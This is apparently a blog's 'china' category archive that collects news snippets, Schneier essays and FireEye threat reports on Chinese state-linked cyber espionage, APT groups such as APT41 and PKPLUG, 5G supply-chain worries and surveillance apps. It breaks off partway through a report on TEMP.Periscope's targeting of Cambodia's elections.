Category Archives: china

China has built ‘massive global data-collection ecosystem’ to boost its interests

Chinese use state-owned enterprises, local tech companies and foreign partnerships, ASPI report says

The Chinese government is sweeping up vast amounts of data from all around the world to bulwark the nation’s security, but most critically to secure the political future of the Communist party, a new report argues.

Engineering Global Consent, a policy brief by the Australian Strategic Policy Institute’s Dr Samantha Hoffman, argues that the Chinese party-state seeks to influence – and where possible control – global online and political environments so that public sentiment around the world is more favourable towards its interests. China has expanded its operations of influence into organisations such as universities in the UK, the US and Australia.

Related: Peter Dutton: China accuses home affairs minister of 'shocking' and 'malicious' slur

Sign up to receive the top stories from Guardian Australia every morning

Related: Australia's relationship with China in a 'terrible' state after Morrison's US visit, Labor says

Continue reading...

6 cyber-espionage campaigns since 2013 attributed to PKPLUG China-linked group

Security experts linked a number of cyber-espionage campaigns observed over the years to the same Chinese threat actor, tracked as PKPLUG.

Security experts linked a number of cyber-espionage campaigns observed over the years to the same Chinese threat actor, tracked as PKPLUG. The name comes from the threat actor using PlugX inside ZIP archives containing the ASCII magic bytes “PK” in the header.

“For three years, Unit 42 has tracked a set of cyber espionage attack campaigns across Asia, which used a mix of publicly available and custom malware. Unit 42 created the moniker “PKPLUG” for the threat actor group, or groups, behind these and other documented attacks referenced later in this report.” reads the report published by Palo Alto Networks. “We say group or groups as our current visibility doesn’t allow us to determine with high confidence if this is the work of one group, or more than one group which uses the same tools and has the same tasking.”

Hackers targeted entities in the Southeast Asia region, most of the victims were in Myanmar, Taiwan, Vietnam, and Indonesia. Experts believe the PKPLUG also targeted other countries in Asia, including Tibet, Xinjiang, and Mongolia. 

The China-linked APT group has been active for at least six years, it used both custom-made and publicly available malware.

Researchers at Palo Alto Networks’ Unit 42 reported that some of the tools used in the campaigns were also involved in attacks carried out by other threat actors.

The experts observed the threat actor mainly delivered the PlugX backdoor, but the attackers also used the HenBox Android malware, the Farseer backdoor for Windows, the 9002 and Zupdax trojans, and Poison Ivy RAT.

Below the timeline of the PKPLUG attacks over the years:


The first campaign associated with the PKPLUG was observed in November 2013, when the group targeted Mongolian individuals with PlugX RAT. In April 2016, researchers from Arbor Network uncovered a campaign aimed at delivering the Poison Ivy to targets in Myanmar and other countries in Asia. A month later, Unit 42 researchers spotted another campaign that targeted entities from Myanmar, the Uyghur minority, Tibet, Vietnam, Indonesia, and Taiwan with the 9002 Trojan.

In March 2017, the Hong Kong-based cybersecurity company VKRL spotted a campaign targeting entities in Mongolia. One year later, on March 2018, Unit 42 experts spotted a campaign involving a new Android malware family named “HenBox.” Hackers targeted primarily the Uyghurs minority.

Early 2019, Unit 42 researchers discovered a previously-unknown Windows backdoor Trojan called Farseer that was used by the threat actors in attacks against targets in Myanmar. Experts noticed overlaps between the infrastructure and the malware used in different campaigns.

“Overlaps between the different campaigns documented, and the malware families used in them, exist both in infrastructure (domain names and IP addresses being reused, sometimes in multiple cases) and in terms of malicious traits (program runtime behaviors or static code characteristics are also where relationships can be found or strengthened).” continues the analysis.

In at least four of the six campaigns, the threat actors used a shared set of IP addresses as command and control (C2) infrastructure.

Researchers also discovered that attackers used the same registrant for various domain names hosted at those addresses.

“Based on what we know and what we’ve gleaned from others’ publications, and through industry sharing, PKPLUG is a threat group, or groups, operating for at least the last six years using several malware families — some more well-known: Poison Ivy, PlugX, and Zupdax; some are less well-known: 9002, HenBox, and Farseer.” concludes the analysis. “Unit 42 has been tracking the adversary for three years and based on public reporting believes with high confidence that it has origins to Chinese nation-state adversaries.”

Pierluigi Paganini

(SecurityAffairs – PKPLUG, China)

The post 6 cyber-espionage campaigns since 2013 attributed to PKPLUG China-linked group appeared first on Security Affairs.

US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply

US continues to warn its allies over China’s “predatory approach” especially for 5G technology, this time US Secretary of State alerts Italy.

US Secretary of State Mike Pompeo during the recent meeting with Italian Foreign Minister Luigi Di Maio warned Italy of China’s “predatory approach” to trade and investment.

Once again US is warning its allies over Chinese 5G technology, but the Italian Government explained that its special powers over 5G supply deals would mitigate any risk.

According to Pompeo, China and its technology pose a serious threat to the homeland security of the US and its allies.

“China has a predatory approach in trade and investment” and represents a “mutual threat” to the two countries” explained Pompeo during a joint press conference with Italy’s Foreign Minister Luigi Di Maio.

“When the Chinese Communist party shows up to make an investment to gain political power or threaten a nation’s security, that’s what needs to be protected against,”

Di Maio explained that the Italian Government opted to protect its infrastructure invoking the so-called “golden powers” in supply deals for fifth-generation (5G) telecom services. According to Di Maio, the golden powers over the supply deals on technology “make [Italy] among the most advanced in Europe on security”.

“We have no intention of taking part in trade accords that might harm our sovereignty as a state,” he added.

In September, Italy has exercised special powers in relation to the purchase of goods and services. The Italian government will impose conditions and technical specifications for the purchase of equipemnt and services for its 5G infrastructure.

In August, Romania announced it will ban Chinese giant Huawei from its 5G network, reads a joint statement signed by the Romanian and US presidents.

In April, British Government approved a limited role for Huawei in the building of a national 5G network in the country, ignoring security concerns from senior ministers. In December, a Czech cyber-security agency warned against using Huawei and ZTE technologies because they pose a threat to state security.

The Chinese giant was already excluded by several countries from building their 5G internet networks. The United StatesAustraliaNew Zealand, and Japan announced the exclusion of Huawei technology for their 5G internet networks.

Pierluigi Paganini

(SecurityAffairs – China, 5G)

The post US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply appeared first on Security Affairs.

A Look Into Continuous Efforts By Chinese Hackers to Target Foreign Governments

Phishing is still one of the widely used strategies by cybercriminals and espionage groups to gain an initial foothold on the targeted systems. Though hacking someone with phishing attacks was easy a decade ago, the evolution of threat detection technologies and cyber awareness among people has slowed down the success of phishing and social engineering attacks over the years. Since phishing

Supply-Chain Security and Trust

The United States government's continuing disagreement with the Chinese company Huawei underscores a much larger problem with computer technologies in general: We have no choice but to trust them completely, and it's impossible to verify that they're trustworthy. Solving this problem ­ which is increasingly a national security issue ­ will require us to both make major policy changes and invent new technologies.

The Huawei problem is simple to explain. The company is based in China and subject to the rules and dictates of the Chinese government. The government could require Huawei to install back doors into the 5G routers it sells abroad, allowing the government to eavesdrop on communications or ­-- even worse ­-- take control of the routers during wartime. Since the United States will rely on those routers for all of its communications, we become vulnerable by building our 5G backbone on Huawei equipment.

It's obvious that we can't trust computer equipment from a country we don't trust, but the problem is much more pervasive than that. The computers and smartphones you use are not built in the United States. Their chips aren't made in the United States. The engineers who design and program them come from over a hundred countries. Thousands of people have the opportunity, acting alone, to slip a back door into the final product.

There's more. Open-source software packages are increasingly targeted by groups installing back doors. Fake apps in the Google Play store illustrate vulnerabilities in our software distribution systems. The NotPetya worm was distributed by a fraudulent update to a popular Ukranian accounting package, illustrating vulnerabilities in our update systems. Hardware chips can be back-doored at the point of fabrication, even if the design is secure. The National Security Agency exploited the shipping process to subvert Cisco routers intended for the Syrian telephone company. The overall problem is that of supply-chain security, because every part of the supply chain can be attacked.

And while nation-state threats like China and Huawei ­-- or Russia and the antivirus company Kaspersky a couple of years earlier ­-- make the news, many of the vulnerabilities I described above are being exploited by cybercriminals.

Policy solutions involve forcing companies to open their technical details to inspection, including the source code of their products and the designs of their hardware. Huawei and Kaspersky have offered this sort of openness as a way to demonstrate that they are trustworthy. This is not a worthless gesture, and it helps, but it's not nearly enough. Too many back doors can evade this kind of inspection.

Technical solutions fall into two basic categories, both currently beyond our reach. One is to improve the technical inspection processes for products whose designers provide source code and hardware design specifications, and for products that arrive without any transparency information at all. In both cases, we want to verify that the end product is secure and free of back doors. Sometimes we can do this for some classes of back doors: We can inspect source code ­ this is how a Linux back door was discovered and removed in 2003 ­ or the hardware design, which becomes a cleverness battle between attacker and defender.

This is an area that needs more research. Today, the advantage goes to the attacker. It's hard to ensure that the hardware and software you examine is the same as what you get, and it's too easy to create back doors that slip past inspection. And while we can find and correct some of these supply-chain attacks, we won't find them all. It's a needle-in-a-haystack problem, except we don't know what a needle looks like. We need technologies, possibly based on artificial intelligence, that can inspect systems more thoroughly and faster than humans can do. We need them quickly.

The other solution is to build a secure system, even though any of its parts can be subverted. This is what the former Deputy Director of National Intelligence Sue Gordon meant in April when she said about 5G, "You have to presume a dirty network." Or more precisely, can we solve this by building trustworthy systems out of untrustworthy parts?

It sounds ridiculous on its face, but the Internet itself was a solution to a similar problem: a reliable network built out of unreliable parts. This was the result of decades of research. That research continues today, and it's how we can have highly resilient distributed systems like Google's network even though none of the individual components are particularly good. It's also the philosophy behind much of the cybersecurity industry today: systems watching one another, looking for vulnerabilities and signs of attack.

Security is a lot harder than reliability. We don't even really know how to build secure systems out of secure parts, let alone out of parts and processes that we can't trust and that are almost certainly being subverted by governments and criminals around the world. Current security technologies are nowhere near good enough, though, to defend against these increasingly sophisticated attacks. So while this is an important part of the solution, and something we need to focus research on, it's not going to solve our near-term problems.

At the same time, all of these problems are getting worse as computers and networks become more critical to personal and national security. The value of 5G isn't for you to watch videos faster; it's for things talking to things without bothering you. These things ­-- cars, appliances, power plants, smart cities --­ increasingly affect the world in a direct physical manner. They're increasingly autonomous, using A.I. and other technologies to make decisions without human intervention. The risk from Chinese back doors into our networks and computers isn't that their government will listen in on our conversations; it's that they'll turn the power off or make all the cars crash into one another.

All of this doesn't leave us with many options for today's supply-chain problems. We still have to presume a dirty network ­-- as well as back-doored computers and phones -- and we can clean up only a fraction of the vulnerabilities. Citing the lack of non-Chinese alternatives for some of the communications hardware, already some are calling to abandon attempts to secure 5G from Chinese back doors and work on having secure American or European alternatives for 6G networks. It's not nearly enough to solve the problem, but it's a start.

Perhaps these half-solutions are the best we can do. Live with the problem today, and accelerate research to solve the problem for the future. These are research projects on a par with the Internet itself. They need government funding, like the Internet itself. And, also like the Internet, they're critical to national security.

Critically, these systems must be as secure as we can make them. As former FCC Commissioner Tom Wheeler has explained, there's a lot more to securing 5G than keeping Chinese equipment out of the network. This means we have to give up the fantasy that law enforcement can have back doors to aid criminal investigations without also weakening these systems. The world uses one network, and there can only be one answer: Either everyone gets to spy, or no one gets to spy. And as these systems become more critical to national security, a network secure from all eavesdroppers becomes more important.

This essay previously appeared in the New York Times.

On Chinese "Spy Trains"

The trade war with China has reached a new industry: subway cars. Congress is considering legislation that would prevent the world's largest train maker, the Chinese-owned CRRC Corporation, from competing on new contracts in the United States.

Part of the reasoning behind this legislation is economic, and stems from worries about Chinese industries undercutting the competition and dominating key global industries. But another part involves fears about national security. News articles talk about "spy trains," and the possibility that the train cars might surreptitiously monitor their passengers' faces, movements, conversations or phone calls.

This is a complicated topic. There is definitely a national security risk in buying computer infrastructure from a country you don't trust. That's why there is so much worry about Chinese-made equipment for the new 5G wireless networks.

It's also why the United States has blocked the cybersecurity company Kaspersky from selling its Russian-made antivirus products to US government agencies. Meanwhile, the chairman of China's technology giant Huawei has pointed to NSA spying disclosed by Edward Snowden as a reason to mistrust US technology companies.

The reason these threats are so real is that it's not difficult to hide surveillance or control infrastructure in computer components, and if they're not turned on, they're very difficult to find.

Like every other piece of modern machinery, modern train cars are filled with computers, and while it's certainly possible to produce a subway car with enough surveillance apparatus to turn it into a "spy train," in practice it doesn't make much sense. The risk of discovery is too great, and the payoff would be too low. Like the United States, China is more likely to try to get data from the US communications infrastructure, or from the large Internet companies that already collect data on our every move as part of their business model.

While it's unlikely that China would bother spying on commuters using subway cars, it would be much less surprising if a tech company offered free Internet on subways in exchange for surveillance and data collection. Or if the NSA used those corporate systems for their own surveillance purposes (just as the agency has spied on in-flight cell phone calls, according to an investigation by the Intercept and Le Monde, citing documents provided by Edward Snowden). That's an easier, and more fruitful, attack path.

We have credible reports that the Chinese hacked Gmail around 2010, and there are ongoing concerns about both censorship and surveillance by the Chinese social-networking company TikTok. (TikTok's parent company has told the Washington Post that the app doesn't send American users' info back to Beijing, and that the Chinese government does not influence the app's use in the United States.)

Even so, these examples illustrate an important point: there's no escaping the technology of inevitable surveillance. You have little choice but to rely on the companies that build your computers and write your software, whether in your smartphones, your 5G wireless infrastructure, or your subway cars. And those systems are so complicated that they can be secretly programmed to operate against your interests.

Last year, Le Monde reported that the Chinese government bugged the computer network of the headquarters of the African Union in Addis Ababa. China had built and outfitted the organization's new headquarters as a foreign aid gift, reportedly secretly configuring the network to send copies of confidential data to Shanghai every night between 2012 and 2017. China denied having done so, of course.

If there's any lesson from all of this, it's that everybody spies using the Internet. The United States does it. Our allies do it. Our enemies do it. Many countries do it to each other, with their success largely dependent on how sophisticated their tech industries are.

China dominates the subway car manufacturing industry because of its low prices­ -- the same reason it dominates the 5G hardware industry. Whether these low prices are because the companies are more efficient than their competitors or because they're being unfairly subsidized by the Chinese government is a matter to be determined at trade negotiations.

Finally, Americans must understand that higher prices are an inevitable result of banning cheaper tech products from China.

We might willingly pay the higher prices because we want domestic control of our telecommunications infrastructure. We might willingly pay more because of some protectionist belief that global trade is somehow bad. But we need to make these decisions to protect ourselves deliberately and rationally, recognizing both the risks and the costs. And while I'm worried about our 5G infrastructure built using Chinese hardware, I'm not worried about our subway cars.

This essay originally appeared on

EDITED TO ADD: I had a lot of trouble with CNN's legal department with this essay. They were very reluctant to call out the US and its allies for similar behavior, and spent a lot more time adding caveats to statements that I didn't think needed them. They wouldn't let me link to this Intercept article talking about US, French, and German infiltration of supply chains, or even the NSA document from the Snowden archives that proved the statements.

Czech Intelligence ‘s report attributes major cyber attack to China

The Czech Intelligence agency blames China for a major cyber attack that hit a key government institution in the Czech Republic in 2018.

According to a report published by the NUKIB Czech Intelligence agency, China carried out a major cyber attack on a key government institution in the Czech Republic last year.

The report issued by the NUKIB agency states that the attack “was almost certainly carried out by a state actor or a related group,” and “a Chinese actor” is the main suspect.

In August, 2019, a parliamentary committee in the Czech Republic revealed that the National Cyber and Information Security Agency blamed a foreign state for a cyber attack that targeted the Czech Foreign Ministry.

The committee did not reveal the name of the state allegedly involved in the attack. A government source told Reuters that Czech authorities suspected the attacks originated from Russia. The Czech experts discovered the security breach early January 2017.

Interior Minister Jan Hamacek told the CTK news agency that the government infrastructures have been dealing with the cyber attack for several months.

Czech intelligence warns of cyber attacks launched by both China and Russia threat actors.

“The Czech cabinet is due to discuss the findings on Monday.” reported the AFP press. “NUKIB spokesman Radek Holy told AFP the watchdog would not make the report public until then.”

Pierluigi Paganini

(SecurityAffairs – Czech Intelligence, hacking)

The post Czech Intelligence ‘s report attributes major cyber attack to China appeared first on Security Affairs.

Scientists invent new technology to print invisible messages

Messages can only be seen under UV light and can be erased using a hairdryer

Forget lemon juice and hot irons, there is a new way to write and read invisible messages – and it can be used again and again.

The approach, developed by researchers in China, involves using water to print messages on paper coated with manganese-containing chemicals. The message, invisible to the naked eye, can be read by shining UV light on the paper.

Continue reading...

Report: Use of AI surveillance is growing around the world

It's not just China: at least 75 out of 176 countries globally are actively using AI technologies for surveillance purposes, research shows.

Australia is confident that China was behind attack on parliament, political parties

Australia ‘s intelligence is sure that China is behind the cyberattacks that hit its parliament and political parties, but decided to not publicly accuse it.

According to the Reuters agency, Australia’s intelligence has evidence that the attacks that hit its parliament and political parties were orchestrated by China. Anyway the Australian government decided to not publicly accuse it to preserve trade relations with Beijing.

Reuters cited five sources within the Australian intelligence that attributed the attacks on its national parliament and three largest political parties before the general election in May to China-linked hackers.

“Australia’s cyber intelligence agency – the Australian Signals Directorate (ASD) – concluded in March that China’s Ministry of State Security was responsible for the attack, the five people with direct knowledge of the findings of the investigation told Reuters.” reported the Reuters.

“The report, which also included input from the Department of Foreign Affairs, recommended keeping the findings secret in order to avoid disrupting trade relations with Beijing, two of the people said.”

Australia Australian National University hack australian parliament house

Australia disclosed the attacks in February, at the time experts speculated the involvement of a nation-date actor without attributed the attacks to a specific threat actor.

China is Australia’s biggest trading partner and its not surprising that its government gathers intelligence on it. Beijing denied any involvement in the attacks and China’s Foreign Ministry pointed out that his country is also the target of numerous attacks.

“When investigating and determining the nature of online incidents there must be full proof of the facts, otherwise it’s just creating rumors and smearing others, pinning labels on people indiscriminately. We would like to stress that China is also a victim of internet attacks,” the Ministry told the Reuters.

“China hopes that Australia can meet China halfway, and do more to benefit mutual trust and cooperation between the two countries.”

When the Australian authorities discovered the attacks, the IT staff forced a password reset to every person working at the parliament.

According to information collected by Reuters, the hackers did access private emails and policy paper from members of the Liberal, National and Labor parties.

Australian experts shared their findings with the United States and the United Kingdom, the latter sent a team of cyber experts to Canberra to help investigate the attack.

“Australian investigators found the attacker used code and techniques known to have been used by China in the past, according to the two sources.” concludes the Reuters. “Australian investigators found the attacker used code and techniques known to have been used by China in the past, according to the two sources.”

Pierluigi Paganini

(SecurityAffairs – Australia, hacking)

The post Australia is confident that China was behind attack on parliament, political parties appeared first on Security Affairs.

A ‘deep fake’ app will make us film stars – but will we regret our narcissism?

Users of Zao can now add themselves into the scenes of their favourite movies. But is our desire to insert ourselves into everything putting our privacy at risk?

‘You oughta be in pictures,” goes the 1934 Rudy Vallée song. And, as of last week, pretty much anyone can be. The entry requirements for being a star fell dramatically thanks to the launch, in China, of a face-swapping app that can decant users into film and TV clips.

Zao, which has quickly become China’s most downloaded free app, fuses the face in the original clip with your features. All that is required is a single selfie and the man or woman in the street is transformed into a star of the mobile screen, if not quite the silver one. In other words, anyone who yearns to be part of Titanic or Game of Thrones, The Big Bang Theory or the latest J-Pop sensation can now bypass the audition and go straight to the limelight without all that pesky hard work, talent and dedication. A whole new generation of synthetic movie idols could be unleashed upon the world: a Humphrey Bogus, a Phony Curtis, a Fake Dunaway.

Related: The rise of the deepfake and the threat to democracy

Continue reading...

Chinese tech firm Huawei says it was hacked by the United States

The Chinese technology giant says the United States has launched hacking attacks against its intranet and internal network.

But attributing a cyber attack to a particular party is notoriously difficult. It would certainly be just as fascinating to see Huawei’s reasons why it believes the USA hacked it, as to see what evidence the United States has against Huawei.

Chinese deepfake app Zao sparks privacy row after going viral

Critics say face-swap app could spread misinformation on a massive scale

A Chinese app that lets users convincingly swap their faces with film or TV characters has rapidly become one of the country’s most downloaded apps, triggering a privacy row.

Related: The rise of the deepfake and the threat to democracy

In case you haven't heard, #ZAO is a Chinese app which completely blew up since Friday. Best application of 'Deepfake'-style AI facial replacement I've ever seen.

Here's an example of me as DiCaprio (generated in under 8 secs from that one photo in the thumbnail)

Continue reading...

Uighurs in China were target of two-year iOS malware attack – reports

Android and Windows devices also targeted in campaign believed to be state-backed

Chinese Uighurs were the target of an iOS malware attack lasting more than two years that was revealed last week, according to multiple reports.

Android and Windows devices were also targeted in the campaign, which took the form of “watering hole attacks”: taking over commonly visited websites or redirecting their visitors to clones in order to indiscriminately attack each member of a community.

Related: China’s hi-tech war on its Muslim minority

Continue reading...

Healthcare: Research Data and PII Continuously Targeted by Multiple Threat Actors

The healthcare industry faces a range of threat groups and malicious activity. Given the critical role that healthcare plays within society and its relationship with our most sensitive information, the risk to this sector is especially consequential. It may also be one of the major reasons why we find healthcare to be one of the most retargeted industries.

In our new report, Beyond Compliance: Cyber Threats and Healthcare, we share an update on the types of threats observed affecting healthcare organizations: from criminal targeting of patient data to less frequent – but still high impact – cyber espionage intrusions, as well as disruptive and destructive threats. We urge you to review the full report for these insights, however, these are two key areas to keep in mind.

  • Chinese espionage targeting of medical researchers: We’ve seen medical research – specifically cancer research – continue to be a focus of multiple Chinese espionage groups. While difficult to fully assess the extent, years of cyber-enabled theft of research trial data might be starting to have an impact, as Chinese companies are reportedly now manufacturing cancer drugs at a lower cost to Western firms.
  • Healthcare databases for sale under $2,000:  The sheer number of healthcare-associated databases for sale in the underground is outrageous. Even more concerning, many of these databases can be purchased for under $2,000 dollars (based on sales we observed over a six-month period).

To learn more about the types of financially motivated cyber threat activity impacting healthcare organizations, nation state threats the healthcare sector should be aware of, and how the threat landscape is expected to evolve in the future, check out the full report here, or give a listen to this podcast conversation between Principal Analyst Luke McNamara and Grady Summers, EVP, Products:

For a closer look at the latest breach and threat landscape trends facing the healthcare sector, register for our Sept. 17, 2019, webinar.

For more details around an actor who has targeted healthcare, read about our newly revealed APT group, APT41.

Chinese cyberhackers ‘blurring line between state power and crime’

Cybersecurity firm FireEye says ‘aggressive’ APT41 group working for Beijing is also hacking video games to make money

A group of state-sponsored hackers in China ran activities for personal gain at the same time as undertaking spying operations for the Chinese government in 14 different countries, the cybersecurity firm FireEye has said.

In a report released on Thursday, the company said the hacking group APT41 was different to other China-based groups tracked by security firms in that it used non-public malware typically reserved for espionage to make money through attacks on video game companies.

Related: Australia joins condemnation of 'huge, audacious' Chinese hacking plot

Continue reading...

APT41: A Dual Espionage and Cyber Crime Operation

Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.

The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group’s tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).

Who Does APT41 Target?

Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.

The group’s financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns.

Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign’s desired targeting can be discerned based on recipients' email addresses.

A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.


Figure 1: Timeline of industries directly targeted by APT41

Probable Chinese Espionage Contractors

Two identified personas using the monikers “Zhang Xuguang” and “Wolfzhi” linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, similar to APT41 operational times against online gaming targets and suggesting that he is moonlighting. Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.

Attribution to these individuals is backed by identified persona information, their previous work and apparent expertise in programming skills, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations.

Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012

The Right Tool for the Job

APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign running almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware including backdoors, credential stealers, keyloggers, and rootkits.

APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.

Fast and Relentless

APT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization’s network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.

The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.

Looking Ahead

APT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation’s distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).

Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.

APT41's links to both underground marketplaces and state-sponsored activity may indicate the group enjoys protections that enables it to conduct its own for-profit activities, or authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.

How Chinese spy app allows officials to harvest personal data

Intrusive software collects emails and texts and could be used to track movement

The tourists travelling into China were never supposed to know their phones had been compromised.

The surveillance app being installed on their devices should have been removed by the border officers tasked with the job. But their apparent carelessness has provided a rare insight into the techniques used by China to snoop on visitors and the kind of information being harvested from their phones.

Continue reading...

Australian National University hit by huge data breach

Vice-chancellor says hack involved personal and payroll details going back 19 years

The Australian National University is in damage control after discovering a major data breach a fortnight ago in which a “significant” amount of staff and student information was accessed by a “sophisticated operator”.

The university has confirmed an estimated 200,000 people have been affected by the hack, based on student numbers each year and staff turnover.

Related: Australian security services investigate attempted cyber attack on parliament

Continue reading...

Forcing the Adversary to Pursue Insider Theft

Jack Crook pointed me toward a story by Christopher Burgess about intellectual property theft by "Hongjin Tan, a 35 year old Chinese national and U.S. legal permanent resident... [who] was arrested on December 20 and charged with theft of trade secrets. Tan is alleged to have stolen the trade secrets from his employer, a U.S. petroleum company," according to the criminal complaint filed by the US DoJ.

Tan's former employer and the FBI allege that Tan "downloaded restricted files to a personal thumb drive." I could not tell from the complaint if Tan downloaded the files at work or at home, but the thumb drive ended up at Tan's home. His employer asked Tan to bring it to their office, which Tan did. However, he had deleted all the files from the drive. Tan's employer recovered the files using commercially available forensic software.

This incident, by definition, involves an "insider threat." Tan was an employee who appears to have copied information that was outside the scope of his work responsibilities, resigned from his employer, and was planning to return to China to work for a competitor, having delivered his former employer's intellectual property.

When I started GE-CIRT in 2008 (officially "initial operating capability" on 1 January 2009), one of the strategies we pursued involved insider threats. I've written about insiders on this blog before but I couldn't find a description of the strategy we implemented via GE-CIRT.

We sought to make digital intrusions more expensive than physical intrusions.

In other words, we wanted to make it easier for the adversary to accomplish his mission using insiders. We wanted to make it more difficult for the adversary to accomplish his mission using our network.

In a cynical sense, this makes security someone else's problem. Suddenly the physical security team is dealing with the worst of the worst!

This is a win for everyone, however. Consider the many advantages the physical security team has over the digital security team.

The physical security team can work with human resources during the hiring process. HR can run background checks and identify suspicious job applicants prior to granting employment and access.

Employees are far more exposed than remote intruders. Employees, even under cover, expose their appearance, likely residence, and personalities to the company and its workers.

Employees can be subject to far more intensive monitoring than remote intruders. Employee endpoints can be instrumented. Employee workspaces are instrumented via access cards, cameras at entry and exit points, and other measures.

Employers can cooperate with law enforcement to investigate and prosecute employees. They can control and deter theft and other activities.

In brief, insider theft, like all "close access" activities, is incredibly risky for the adversary. It is a win for everyone when the adversary must resort to using insiders to accomplish their mission. Digital and physical security must cooperate to leverage these advantages, while collaborating with human resources, legal, information technology, and business lines to wring the maximum results from this advantage.

Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally


FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia's politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures. This campaign occurs in the run up to the country’s July 29, 2018, general elections. TEMP.Periscope used the same infrastructure for a range of activity against other more traditional targets, including the defense industrial base in the United States and a chemical company based in Europe. Our previous blog post focused on the group’s targeting of engineering and maritime entities in the United States.

Overall, this activity indicates that the group maintains an extensive intrusion architecture and wide array of malicious tools, and targets a large victim set, which is in line with typical Chinese-based APT efforts. We expect this activity to provide the Chinese government with widespread visibility into Cambodian elections and government operations. Additionally, this group is clearly able to run several large-scale intrusions concurrently across a wide range of victim types.

Our analysis also strengthened our overall attribution of this group. We observed the toolsets we previously attributed to this group, their observed targets are in line with past group efforts and also highly similar to known Chinese APT efforts, and we identified an IP address originating in Hainan, China that was used to remotely access and administer a command and control (C2) server.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities (targeting is summarized in Figure 1). The group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting by Proofpoint and F-Secure on "NanHaiShu."

Figure 1: Summary of TEMP.Periscope activity

Incident Background

FireEye analyzed files on three open indexes believed to be controlled by TEMP.Periscope, which yielded insight into the group's objectives, operational tactics, and a significant amount of technical attribution/validation. These files were "open indexed" and thus accessible to anyone on the public internet. This TEMP.Periscope activity on these servers extends from at least April 2017 to the present, with the most current operations focusing on Cambodia's government and elections.

  • Two servers, chemscalere[.]com and scsnewstoday[.]com, operate as typical C2 servers and hosting sites, while the third, mlcdailynews[.]com, functions as an active SCANBOX server. The C2 servers contained both logs and malware.
  • Analysis of logs from the three servers revealed:
